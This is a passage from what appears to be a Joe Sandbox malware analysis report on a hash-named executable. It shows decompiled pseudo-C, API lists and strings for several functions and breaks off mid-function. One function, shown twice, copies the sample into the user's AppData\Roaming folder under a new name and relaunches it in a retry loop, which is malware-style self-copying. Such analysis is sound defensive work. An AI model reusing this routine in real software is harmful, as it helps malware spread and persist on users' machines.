Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041FAE0, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 109

C-Code - Quality: 87%

			E0041FAE0(void* __ebx, void* __eflags) {
				signed int _v8;
				char _v28;
				char _v8218;
				short _v8220;
				struct _STARTUPINFOW _v8292;
				struct _PROCESS_INFORMATION _v8308;
				void* __edi;
				void* __esi;
				signed int _t21;
				void* _t29;
				long _t30;
				int _t40;
				signed int _t63;
				void* _t64;
				void* _t66;
				void* _t67;

				E0042E220(0x2070);
				_t21 =  *0x43f054; // 0xd46ffb00
				_v8 = _t21 ^ _t63;
				_v8220 = 0;
				E0042D0A0( &_v8218, 0, 0x1ffe);
				E004233D0( &_v28, 5); // executed
				_push(PathFindFileNameW("C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe"));
				E00414300(0x1000,  &_v8220, L"%s\\%s", "C:\Users\admin\AppData\Roaming");
				_t66 = _t64 + 0x24;
				_t29 = CreateFileW( &_v8220, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t61 = _t29;
				_t30 = GetLastError();
				_t59 = _t30;
				CloseHandle(_t29);
				if(_t30 != 2) {
					__eflags = 0;
					return E004256FE(0, __ebx, _v8 ^ _t63, 0x1000, _t59, _t61);
				} else {
					_push( &_v28);
					E00414300(0x1000,  &_v8220, L"%s\\%she45.exe", "C:\Users\admin\AppData\Roaming");
					_t67 = _t66 + 0x10;
					do {
						CopyFileW("C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe",  &_v8220, 0); // executed
						E0042D0A0( &_v8292, 0, 0x44);
						_t67 = _t67 + 0xc;
						_v8292.wShowWindow = 1;
						_v8292.dwFlags = 1;
						_v8292.cb = 0x44;
						_t40 = CreateProcessW(0,  &_v8220, 0, 0, 0, 0x20, 0, 0,  &_v8292,  &_v8308); // executed
						_t70 = _t40;
					} while (_t40 == 0);
					E0041FC50(__ebx,  &_v8292, CreateProcessW, CopyFileW, _t70); // executed
					return E004256FE(1, __ebx, _v8 ^ _t63,  &_v8292, CreateProcessW, CopyFileW);
				}
			}

0x0041faea
0x0041faef
0x0041faf6
0x0041fb0a
0x0041fb11
0x0041fb1c
0x0041fb2f
0x0041fb46
0x0041fb4b
0x0041fb64
0x0041fb6a
0x0041fb6c
0x0041fb73
0x0041fb75
0x0041fb7e
0x0041fc3a
0x0041fc45
0x0041fb84
0x0041fb87
0x0041fb9e
0x0041fbaf
0x0041fbb2
0x0041fbc0
0x0041fbcd
0x0041fbd2
0x0041fbf2
0x0041fbf9
0x0041fc0a
0x0041fc14
0x0041fc16
0x0041fc16
0x0041fc1a
0x0041fc33
0x0041fc33

APIs

Part of subcall function 004233D0: GetTickCount.KERNEL32(?,?,?,?,0041386B,00442000,00000003), ref: 004233E1
Part of subcall function 004233D0: Sleep.KERNELBASE(0000000F), ref: 00423417

PathFindFileNameW.SHLWAPI(C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe), ref: 0041FB29
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041FB64
GetLastError.KERNEL32(?,?,?,?,?,00000000,76F85660,?,0041F500), ref: 0041FB6C
CloseHandle.KERNEL32(00000000), ref: 0041FB75
CopyFileW.KERNEL32(C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe,?,00000000), ref: 0041FBC0
CreateProcessW.KERNEL32 ref: 0041FC14

Part of subcall function 0041FC50: GetShortPathNameW.KERNEL32(?,?,00001000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041FCA1

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

D, xrefs: 0041FC0A
C:\Users\admin\AppData\Roaming, xrefs: 0041FB30, 0041FB88
%s\%she45.exe, xrefs: 0041FB93
%s\%s, xrefs: 0041FB3B
C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, xrefs: 0041FB24, 0041FBBB

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041FAE0, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 109

C-Code - Quality: 87%

			E0041FAE0(void* __ebx, void* __eflags) {
				signed int _v8;
				char _v28;
				char _v8218;
				short _v8220;
				struct _STARTUPINFOW _v8292;
				struct _PROCESS_INFORMATION _v8308;
				void* __edi;
				void* __esi;
				signed int _t21;
				void* _t29;
				long _t30;
				int _t40;
				signed int _t63;
				void* _t64;
				void* _t66;
				void* _t67;

				E0042E220(0x2070);
				_t21 =  *0x43f054; // 0xd46ffb00
				_v8 = _t21 ^ _t63;
				_v8220 = 0;
				E0042D0A0( &_v8218, 0, 0x1ffe);
				E004233D0( &_v28, 5); // executed
				_push(PathFindFileNameW(0x46c238));
				E00414300(0x1000,  &_v8220, L"%s\\%s", "C:\Users\admin\AppData\Roaming");
				_t66 = _t64 + 0x24;
				_t29 = CreateFileW( &_v8220, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t61 = _t29;
				_t30 = GetLastError();
				_t59 = _t30;
				CloseHandle(_t29);
				if(_t30 != 2) {
					__eflags = 0;
					return E004256FE(0, __ebx, _v8 ^ _t63, 0x1000, _t59, _t61);
				} else {
					_push( &_v28);
					E00414300(0x1000,  &_v8220, L"%s\\%she45.exe", "C:\Users\admin\AppData\Roaming");
					_t67 = _t66 + 0x10;
					do {
						CopyFileW(0x46c238,  &_v8220, 0); // executed
						E0042D0A0( &_v8292, 0, 0x44);
						_t67 = _t67 + 0xc;
						_v8292.wShowWindow = 1;
						_v8292.dwFlags = 1;
						_v8292.cb = 0x44;
						_t40 = CreateProcessW(0,  &_v8220, 0, 0, 0, 0x20, 0, 0,  &_v8292,  &_v8308); // executed
						_t70 = _t40;
					} while (_t40 == 0);
					E0041FC50(__ebx,  &_v8292, CreateProcessW, CopyFileW, _t70); // executed
					return E004256FE(1, __ebx, _v8 ^ _t63,  &_v8292, CreateProcessW, CopyFileW);
				}
			}

APIs

Part of subcall function 004233D0: GetTickCount.KERNEL32(?,?,?,?,0041386B,00442000,00000003), ref: 004233E1
Part of subcall function 004233D0: Sleep.KERNELBASE(0000000F), ref: 00423417

PathFindFileNameW.SHLWAPI(0046C238), ref: 0041FB29
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041FB64
GetLastError.KERNEL32(?,?,?,?,?,00000000,76F85660,?,0041F500), ref: 0041FB6C
CloseHandle.KERNEL32(00000000), ref: 0041FB75
CopyFileW.KERNEL32(0046C238,?,00000000), ref: 0041FBC0
CreateProcessW.KERNEL32 ref: 0041FC14

Part of subcall function 0041FC50: GetShortPathNameW.KERNEL32(?,?,00001000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041FCA1

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

C:\Users\admin\AppData\Roaming, xrefs: 0041FB30, 0041FB88
D, xrefs: 0041FC0A
%s\%she45.exe, xrefs: 0041FB93
%s\%s, xrefs: 0041FB3B

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00420160, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63

C-Code - Quality: 100%

			E00420160() {
				void _v8;
				long _v12;
				short _v15;
				void _v16;
				void* _t8;
				void* _t28;

				_v8 = 0;
				_t8 = CreateFileW("C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
				_t28 = _t8;
				if(_t28 == 0xffffffff) {
					return 0;
				} else {
					SetFilePointer(_t28, 0x3c, 0, 0); // executed
					ReadFile(_t28,  &_v8, 2,  &_v12, 0); // executed
					SetFilePointer(_t28, _v8 + 0x58, 0, 0); // executed
					ReadFile(_t28,  &_v16, 4,  &_v12, 0); // executed
					CloseHandle(_t28);
					return _v15;
				}
			}

0x0042017d
0x00420184
0x0042018a
0x0042018f
0x004201ed
0x00420191
0x004201a0
0x004201b5
0x004201c4
0x004201d3
0x004201d6
0x004201e6
0x004201e6

APIs

CreateFileW.KERNEL32(C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00420184
SetFilePointer.KERNELBASE(00000000,0000003C,00000000,00000000,00000000,7600CD44), ref: 004201A0
ReadFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 004201B5
SetFilePointer.KERNELBASE(00000000,-00000058,00000000,00000000), ref: 004201C4
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004201D3
CloseHandle.KERNEL32(00000000), ref: 004201D6

Strings

C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, xrefs: 00420178

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042B2F2, Relevance: 10.7, APIs: 7, Instructions: 196

C-Code - Quality: 78%

			E0042B2F2() {
				intOrPtr* _v8;
				void** _v12;
				struct _STARTUPINFOW _v80;
				signed int _t61;
				void* _t62;
				long _t65;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				int _t72;
				signed int _t73;
				intOrPtr* _t74;
				void* _t77;
				long _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				int _t93;
				signed char _t98;
				void* _t108;
				signed int _t110;
				signed int* _t111;
				int _t112;
				void** _t115;
				void** _t120;
				signed int _t121;

				GetStartupInfoW( &_v80);
				_push(0x40);
				_t112 = 0x20;
				_push(_t112); // executed
				_t61 = E0042D15F(); // executed
				if(_t61 != 0) {
					_t2 = _t61 + 0x800; // 0x800
					 *0x482280 = _t61;
					 *0x482274 = _t112;
					__eflags = _t61 - _t2;
					if(_t61 >= _t2) {
						L5:
						__eflags = _v80.cbReserved2;
						if(_v80.cbReserved2 == 0) {
							L27:
							_t91 = 0;
							__eflags = 0;
							do {
								_t115 = (_t91 << 6) +  *0x482280;
								_t62 =  *_t115;
								__eflags = _t62 - 0xffffffff;
								if(_t62 == 0xffffffff) {
									L31:
									_t115[1] = 0x81;
									__eflags = _t91;
									if(_t91 != 0) {
										_t50 = _t91 - 1; // -1
										asm("sbb eax, eax");
										_t65 =  ~_t50 + 0xfffffff5;
										__eflags = _t65;
									} else {
										_t65 = 0xfffffff6;
									}
									_t108 = GetStdHandle(_t65);
									__eflags = _t108 - 0xffffffff;
									if(_t108 == 0xffffffff) {
										L43:
										_t58 =  &(_t115[1]);
										 *_t58 = _t115[1] | 0x00000040;
										__eflags =  *_t58;
										 *_t115 = 0xfffffffe;
										goto L44;
									} else {
										__eflags = _t108;
										if(_t108 == 0) {
											goto L43;
										}
										_t69 = GetFileType(_t108);
										__eflags = _t69;
										if(_t69 == 0) {
											goto L43;
										}
										_t70 = _t69 & 0x000000ff;
										 *_t115 = _t108;
										__eflags = _t70 - 2;
										if(_t70 != 2) {
											__eflags = _t70 - 3;
											if(_t70 == 3) {
												_t53 =  &(_t115[1]);
												 *_t53 = _t115[1] | 0x00000008;
												__eflags =  *_t53;
											}
										} else {
											_t115[1] = _t115[1] | 0x00000040;
										}
										_t55 =  &(_t115[3]); // -4727412
										_t72 = InitializeCriticalSectionAndSpinCount(_t55, 0xfa0);
										__eflags = _t72;
										if(_t72 == 0) {
											L48:
											_t68 = _t72 | 0xffffffff;
											L46:
											return _t68;
										} else {
											_t115[2] = _t115[2] + 1;
											goto L44;
										}
									}
								}
								__eflags = _t62 - 0xfffffffe;
								if(_t62 == 0xfffffffe) {
									goto L31;
								}
								_t115[1] = _t115[1] | 0x00000080;
								L44:
								_t91 = _t91 + 1;
								__eflags = _t91 - 3;
							} while (_t91 < 3);
							SetHandleCount( *0x482274);
							_t68 = 0;
							__eflags = 0;
							goto L46;
						}
						_t73 = _v80.lpReserved2;
						__eflags = _t73;
						if(_t73 == 0) {
							goto L27;
						}
						_t93 =  *_t73;
						_t74 = _t73 + 4;
						_v8 = _t74;
						_v12 = _t74 + _t93;
						__eflags = _t93 - 0x800;
						if(_t93 >= 0x800) {
							_t93 = 0x800;
						}
						__eflags =  *0x482274 - _t93; // 0x20
						if(__eflags >= 0) {
							L18:
							_t110 = 0;
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L27;
							} else {
								goto L19;
							}
							do {
								L19:
								_t77 =  *_v12;
								__eflags = _t77 - 0xffffffff;
								if(_t77 == 0xffffffff) {
									goto L26;
								}
								__eflags = _t77 - 0xfffffffe;
								if(_t77 == 0xfffffffe) {
									goto L26;
								}
								_t98 =  *_v8;
								__eflags = _t98 & 0x00000001;
								if((_t98 & 0x00000001) == 0) {
									goto L26;
								}
								__eflags = _t98 & 0x00000008;
								if((_t98 & 0x00000008) != 0) {
									L24:
									_t120 = ((_t110 & 0x0000001f) << 6) + 0x482280[_t110 >> 5];
									 *_t120 =  *_v12;
									_t120[1] =  *_v8;
									_t40 =  &(_t120[3]); // 0xc
									_t72 = InitializeCriticalSectionAndSpinCount(_t40, 0xfa0);
									__eflags = _t72;
									if(_t72 == 0) {
										goto L48;
									}
									_t41 =  &(_t120[2]);
									 *_t41 = _t120[2] + 1;
									__eflags =  *_t41;
									goto L26;
								}
								_t85 = GetFileType(_t77);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L26;
								}
								goto L24;
								L26:
								_v12 =  &(_v12[1]);
								_t110 = _t110 + 1;
								_v8 = _v8 + 1;
								__eflags = _t110 - _t93;
							} while (_t110 < _t93);
							goto L27;
						} else {
							_t111 = 0x482284;
							while(1) {
								_t86 = E0042D15F(0x20, 0x40);
								__eflags = _t86;
								if(_t86 == 0) {
									break;
								}
								 *0x482274 =  *0x482274 + 0x20;
								_t16 = _t86 + 0x800; // 0x800
								 *_t111 = _t86;
								__eflags = _t86 - _t16;
								if(_t86 >= _t16) {
									L15:
									_t111 =  &(_t111[1]);
									__eflags =  *0x482274 - _t93; // 0x20
									if(__eflags < 0) {
										continue;
									}
									goto L18;
								}
								_t87 = _t86 + 5;
								__eflags = _t87;
								do {
									 *(_t87 - 5) =  *(_t87 - 5) | 0xffffffff;
									 *(_t87 + 3) =  *(_t87 + 3) & 0x00000000;
									 *(_t87 + 0x1f) =  *(_t87 + 0x1f) & 0x00000080;
									 *(_t87 + 0x33) =  *(_t87 + 0x33) & 0x00000000;
									 *((short*)(_t87 - 1)) = 0xa00;
									 *((short*)(_t87 + 0x20)) = 0xa0a;
									 *((char*)(_t87 + 0x2f)) = 0;
									_t87 = _t87 + 0x40;
									_t28 = _t87 - 5; // -74
									__eflags = _t28 -  *_t111 + 0x800;
								} while (_t28 <  *_t111 + 0x800);
								goto L15;
							}
							_t93 =  *0x482274; // 0x20
							goto L18;
						}
					}
					_t88 = _t61 + 5;
					__eflags = _t88;
					do {
						 *(_t88 - 5) =  *(_t88 - 5) | 0xffffffff;
						 *((short*)(_t88 - 1)) = 0xa00;
						 *((intOrPtr*)(_t88 + 3)) = 0;
						 *((short*)(_t88 + 0x1f)) = 0xa00;
						 *((char*)(_t88 + 0x21)) = 0xa;
						 *((intOrPtr*)(_t88 + 0x33)) = 0;
						 *((char*)(_t88 + 0x2f)) = 0;
						_t121 =  *0x482280; // 0x14909f0
						_t88 = _t88 + 0x40;
						_t11 = _t88 - 5; // -74
						__eflags = _t11 - _t121 + 0x800;
					} while (_t11 < _t121 + 0x800);
					goto L5;
				}
				return _t61 | 0xffffffff;
			}

0x0042b2ff
0x0042b305
0x0042b309
0x0042b30a
0x0042b30b
0x0042b316
0x0042b320
0x0042b326
0x0042b32b
0x0042b331
0x0042b333
0x0042b36b
0x0042b36d
0x0042b371
0x0042b485
0x0042b485
0x0042b485
0x0042b487
0x0042b48c
0x0042b492
0x0042b494
0x0042b497
0x0042b4a4
0x0042b4a4
0x0042b4a8
0x0042b4aa
0x0042b4b1
0x0042b4b6
0x0042b4b8
0x0042b4b8
0x0042b4ac
0x0042b4ae
0x0042b4ae
0x0042b4c2
0x0042b4c4
0x0042b4c7
0x0042b50b
0x0042b50b
0x0042b50b
0x0042b50b
0x0042b50f
0x00000000
0x0042b4c9
0x0042b4c9
0x0042b4cb
0x00000000
0x00000000
0x0042b4ce
0x0042b4d4
0x0042b4d6
0x00000000
0x00000000
0x0042b4d8
0x0042b4dd
0x0042b4df
0x0042b4e2
0x0042b4ea
0x0042b4ed
0x0042b4ef
0x0042b4ef
0x0042b4ef
0x0042b4ef
0x0042b4e4
0x0042b4e4
0x0042b4e4
0x0042b4f8
0x0042b4fc
0x0042b502
0x0042b504
0x0042b532
0x0042b532
0x0042b52d
0x00000000
0x0042b506
0x0042b506
0x00000000
0x0042b506
0x0042b504
0x0042b4c7
0x0042b499
0x0042b49c
0x00000000
0x00000000
0x0042b49e
0x0042b515
0x0042b515
0x0042b516
0x0042b516
0x0042b525
0x0042b52b
0x0042b52b
0x00000000
0x0042b52b
0x0042b377
0x0042b37a
0x0042b37c
0x00000000
0x00000000
0x0042b382
0x0042b384
0x0042b387
0x0042b391
0x0042b394
0x0042b396
0x0042b398
0x0042b398
0x0042b39a
0x0042b3a0
0x0042b40d
0x0042b40d
0x0042b40f
0x0042b411
0x00000000
0x00000000
0x00000000
0x00000000
0x0042b413
0x0042b413
0x0042b416
0x0042b418
0x0042b41b
0x00000000
0x00000000
0x0042b41d
0x0042b420
0x00000000
0x00000000
0x0042b425
0x0042b427
0x0042b42a
0x00000000
0x00000000
0x0042b42c
0x0042b42f
0x0042b43c
0x0042b449
0x0042b455
0x0042b45c
0x0042b464
0x0042b468
0x0042b46e
0x0042b470
0x00000000
0x00000000
0x0042b476
0x0042b476
0x0042b476
0x00000000
0x0042b476
0x0042b432
0x0042b438
0x0042b43a
0x00000000
0x00000000
0x00000000
0x0042b479
0x0042b479
0x0042b47d
0x0042b47e
0x0042b481
0x0042b481
0x00000000
0x0042b3a2
0x0042b3a2
0x0042b3a7
0x0042b3ab
0x0042b3b2
0x0042b3b4
0x00000000
0x00000000
0x0042b3b6
0x0042b3bd
0x0042b3c3
0x0042b3c5
0x0042b3c7
0x0042b3fa
0x0042b3fa
0x0042b3fd
0x0042b403
0x00000000
0x00000000
0x00000000
0x0042b405
0x0042b3c9
0x0042b3c9
0x0042b3cc
0x0042b3cc
0x0042b3d0
0x0042b3d4
0x0042b3d8
0x0042b3dc
0x0042b3e2
0x0042b3e8
0x0042b3ee
0x0042b3f3
0x0042b3f6
0x0042b3f6
0x00000000
0x0042b3cc
0x0042b407
0x00000000
0x0042b407
0x0042b3a0
0x0042b335
0x0042b335
0x0042b338
0x0042b338
0x0042b33c
0x0042b342
0x0042b345
0x0042b34b
0x0042b34f
0x0042b352
0x0042b355
0x0042b35b
0x0042b35e
0x0042b367
0x0042b367
0x00000000
0x0042b338
0x00000000

APIs

GetStartupInfoW.KERNEL32(?), ref: 0042B2FF

Part of subcall function 0042D15F: Sleep.KERNEL32(00000000), ref: 0042D187

GetFileType.KERNEL32(?), ref: 0042B432
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042B468
GetStdHandle.KERNEL32(-000000F6), ref: 0042B4BC
GetFileType.KERNEL32(00000000), ref: 0042B4CE
InitializeCriticalSectionAndSpinCount.KERNEL32(-00482274,00000FA0), ref: 0042B4FC
SetHandleCount.KERNEL32 ref: 0042B525

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00420160, Relevance: 9.1, APIs: 6, Instructions: 63

C-Code - Quality: 100%

			E00420160() {
				void _v8;
				long _v12;
				short _v15;
				void _v16;
				void* _t8;
				void* _t28;

				_v8 = 0;
				_t8 = CreateFileW(0x46c238, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t28 = _t8;
				if(_t28 == 0xffffffff) {
					return 0;
				} else {
					SetFilePointer(_t28, 0x3c, 0, 0); // executed
					ReadFile(_t28,  &_v8, 2,  &_v12, 0); // executed
					SetFilePointer(_t28, _v8 + 0x58, 0, 0); // executed
					ReadFile(_t28,  &_v16, 4,  &_v12, 0); // executed
					CloseHandle(_t28);
					return _v15;
				}
			}

0x0042017d
0x00420184
0x0042018a
0x0042018f
0x004201ed
0x00420191
0x004201a0
0x004201b5
0x004201c4
0x004201d3
0x004201d6
0x004201e6
0x004201e6

APIs

CreateFileW.KERNEL32(0046C238,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00420184
SetFilePointer.KERNELBASE(00000000,0000003C,00000000,00000000,00000000,7600CD44), ref: 004201A0
ReadFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 004201B5
SetFilePointer.KERNELBASE(00000000,-00000058,00000000,00000000), ref: 004201C4
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004201D3
CloseHandle.KERNEL32(00000000), ref: 004201D6

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 004267E8, Relevance: 7.6, APIs: 5, Instructions: 98

C-Code - Quality: 24%

			E004267E8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				intOrPtr* _t40;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr* _t53;
				intOrPtr* _t55;
				void* _t56;
				void* _t58;

				_push(0x20);
				_push(0x43c0e0);
				E00428E80(__ebx, __edi, __esi);
				E0042B9FB(__ebx, __edi, 8);
				 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
				_t58 =  *0x4404d4 - 1; // 0x0
				if(_t58 != 0) {
					 *0x4404d0 = 1;
					_t34 =  *((intOrPtr*)(_t56 + 0x10));
					 *0x4404cc =  *((intOrPtr*)(_t56 + 0x10));
					if( *((intOrPtr*)(_t56 + 0xc)) == 0) {
						_t55 = __imp__DecodePointer; // executed
						_t34 =  *_t55( *0x4833b4); // executed
						_t45 = 1;
						 *((intOrPtr*)(_t56 - 0x30)) = 1;
						if(1 != 0) {
							_t34 =  *_t55( *0x4833b0); // executed
							_t53 = 1;
							 *((intOrPtr*)(_t56 - 0x2c)) = 1;
							 *((intOrPtr*)(_t56 - 0x24)) = 1;
							 *((intOrPtr*)(_t56 - 0x28)) = 1;
							while(1) {
								_t53 = _t53 - 4;
								 *((intOrPtr*)(_t56 - 0x2c)) = _t53;
								if(_t53 < _t45) {
									goto L11;
								}
								if( *_t53 == _t34) {
									continue;
								} else {
									if(_t53 >= _t45) {
										_t40 =  *_t55( *_t53); // executed
										 *_t53 = E0042A855(_t40);
										 *_t40();
										_t43 =  *_t55( *0x4833b4); // executed
										_t47 = _t43;
										_t34 =  *_t55( *0x4833b0); // executed
										if( *((intOrPtr*)(_t56 - 0x24)) != _t47 ||  *((intOrPtr*)(_t56 - 0x28)) != _t34) {
											 *((intOrPtr*)(_t56 - 0x24)) = _t47;
											 *((intOrPtr*)(_t56 - 0x30)) = _t47;
											 *((intOrPtr*)(_t56 - 0x28)) = _t34;
											_t53 = _t34;
											 *((intOrPtr*)(_t56 - 0x2c)) = _t53;
										}
										_t45 =  *((intOrPtr*)(_t56 - 0x30));
										continue;
									}
								}
								goto L11;
							}
						}
						L11:
						 *((intOrPtr*)(_t56 - 0x1c)) = 0x43129c;
						while( *((intOrPtr*)(_t56 - 0x1c)) < 0x4312a8) {
							_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x1c))));
							if(_t34 != 0) {
								_t34 =  *_t34();
							}
							 *((intOrPtr*)(_t56 - 0x1c)) =  *((intOrPtr*)(_t56 - 0x1c)) + 4;
						}
					}
					 *((intOrPtr*)(_t56 - 0x20)) = 0x4312ac;
					while( *((intOrPtr*)(_t56 - 0x20)) < 0x4312b0) {
						_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x20))));
						if(_t34 != 0) {
							_t34 =  *_t34();
						}
						 *((intOrPtr*)(_t56 - 0x20)) =  *((intOrPtr*)(_t56 - 0x20)) + 4;
					}
				}
				 *(_t56 - 4) = 0xfffffffe;
				L23();
				if( *((intOrPtr*)(_t56 + 0x10)) != 0) {
					return E00428EC5(_t34);
				} else {
					 *0x4404d4 = 1;
					_t36 = E0042B922(8);
					E004266D0( *((intOrPtr*)(_t56 + 8))); // executed
					if( *((intOrPtr*)(_t56 + 0x10)) != 0) {
						return E0042B922(8);
					}
					return _t36;
				}
			}

0x004267e8
0x004267ea
0x004267ef
0x004267f6
0x004267fc
0x00426803
0x00426809
0x0042680f
0x00426814
0x00426817
0x00426820
0x0042682c
0x00426832
0x00426834
0x00426836
0x0042683b
0x00426843
0x00426845
0x00426847
0x0042684a
0x0042684d
0x00426850
0x00426850
0x00426853
0x00426858
0x00000000
0x00000000
0x00426861
0x00000000
0x00426863
0x00426865
0x00426869
0x00426872
0x00426874
0x0042687c
0x0042687e
0x00426886
0x0042688b
0x00426892
0x00426895
0x00426898
0x0042689b
0x0042689d
0x0042689d
0x004268a0
0x00000000
0x004268a0
0x00426865
0x00000000
0x00426861
0x00426850
0x004268a5
0x004268a5
0x004268ac
0x004268b8
0x004268bc
0x004268be
0x004268be
0x004268c0
0x004268c0
0x004268ac
0x004268c6
0x004268cd
0x004268d9
0x004268dd
0x004268df
0x004268df
0x004268e1
0x004268e1
0x004268cd
0x004268e7
0x004268ee
0x004268f7
0x00426927
0x004268f9
0x004268f9
0x00426905
0x0042690e
0x00426917
0x00000000
0x00426920
0x00426921
0x00426921

APIs

Part of subcall function 0042B9FB: EnterCriticalSection.KERNEL32(00000000,00000000,?,0042A922,0000000D), ref: 0042BA25

DecodePointer.KERNEL32(0043C0E0,00000020,0042694F,00000000,00000001,00000000,?,0042698F,000000FF,?,0042BA22,00000011,00000000,?,0042A922,0000000D), ref: 00426832
DecodePointer.KERNEL32(?,0042698F,000000FF,?,0042BA22,00000011,00000000,?,0042A922,0000000D), ref: 00426843

Part of subcall function 0042A855: EncodePointer.KERNEL32(00000000,0042D50B,00440828,00000314,00000000,?,?,?,?,?,00428B12,00440828,Microsoft Visual C++ Runtime Library,00012010), ref: 0042A857

DecodePointer.KERNEL32(-00000004,?,0042698F,000000FF,?,0042BA22,00000011,00000000,?,0042A922,0000000D), ref: 00426869
DecodePointer.KERNEL32(?,0042698F,000000FF,?,0042BA22,00000011,00000000,?,0042A922,0000000D), ref: 0042687C
DecodePointer.KERNEL32(?,0042698F,000000FF,?,0042BA22,00000011,00000000,?,0042A922,0000000D), ref: 00426886

Part of subcall function 0042B922: LeaveCriticalSection.KERNEL32(?,0042B9F9,0000000A,0042B9E9,0043C2A8,0000000C,0042BA16,00000000,00000000,?,0042A922,0000000D), ref: 0042B931

Part of subcall function 004266D0: ExitProcess.KERNEL32 ref: 004266E1

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042BC9B, Relevance: 7.6, APIs: 5, Instructions: 74

C-Code - Quality: 21%

			E0042BC9B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t11;
				intOrPtr* _t12;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t19;
				intOrPtr _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t36;
				intOrPtr* _t37;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;

				_t40 = __imp__DecodePointer;
				_t11 =  *_t40( *0x4833b4, _t33, _t39, _t23, _t27); // executed
				_t24 = _t11;
				_v8 = _t24;
				_t12 =  *_t40( *0x4833b0); // executed
				_t41 = _t12;
				if(_t41 < _t24) {
					L11:
					_t13 = 0;
				} else {
					_t36 = _t41 - _t24;
					_t2 = _t36 + 4; // 0x4
					if(_t2 < 4) {
						goto L11;
					} else {
						_t26 = E0042F682(_t24);
						_t3 = _t36 + 4; // 0x4
						if(_t26 >= _t3) {
							L10:
							_t37 = __imp__EncodePointer; // executed
							_t17 =  *_t37(_a4); // executed
							 *_t41 = _t17;
							_t18 =  *_t37(_t41 + 4); // executed
							 *0x4833b0 = _t18;
							_t13 = _a4;
						} else {
